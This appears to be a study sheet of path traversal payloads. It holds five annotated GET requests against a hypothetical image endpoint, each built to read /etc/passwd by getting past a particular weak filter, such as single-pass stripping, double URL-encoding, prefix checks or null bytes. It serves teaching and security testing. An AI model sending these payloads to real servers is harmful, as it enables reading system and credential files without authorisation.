
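Path traversal

# Payload notes: every request below targets the same hypothetical endpoint, GET /image?filename=...,
# which reads a file named by the query parameter. The number of "../" segments (three here) is only
# an example; add or remove segments to match how deep the application's base directory actually is.
# "Decoded" lines show what the server sees after URL-decoding the query string once.

# 1. No traversal defence at all: the filename is handed straight to the file API.
#    Decoded: /etc/passwd
GET /image?filename=%2fetc%2fpasswd

# 2. Non-recursive filter bypass: the application strips "../" sequences from the user-supplied
#    filename once before using it. Each "....//" collapses to "../" after a single strip pass.
#    Decoded:               ....//....//....//etc/passwd
#    After one strip pass:  ../../../etc/passwd
GET /image?filename=....%2f%2f....%2f%2f....%2f%2fetc%2fpasswd

# 3. Double URL-encoding bypass: useful when the traversal check runs on the once-decoded value but
#    the filename is decoded a second time before the file is opened.
#    Decoded once:  %2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
#    Decoded twice: ../../../etc/passwd
GET /image?filename=%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34

# 4. Path-prefix validation bypass: the check only confirms the filename starts with the expected base
#    directory and never canonicalises it, so "../" after the prefix still escapes the directory.
GET /image?filename=/var/www/images/../../../etc/passwd

# 5. File-extension validation bypass with a null byte: the extension check sees ".png", while the
#    underlying file API truncates the path at %00. Only works on runtimes whose native file API
#    accepts an embedded NUL (legacy PHP/Java); current runtimes reject the path or the request.
GET /image?filename=..%2f..%2f..%2fetc%2fpasswd%00.png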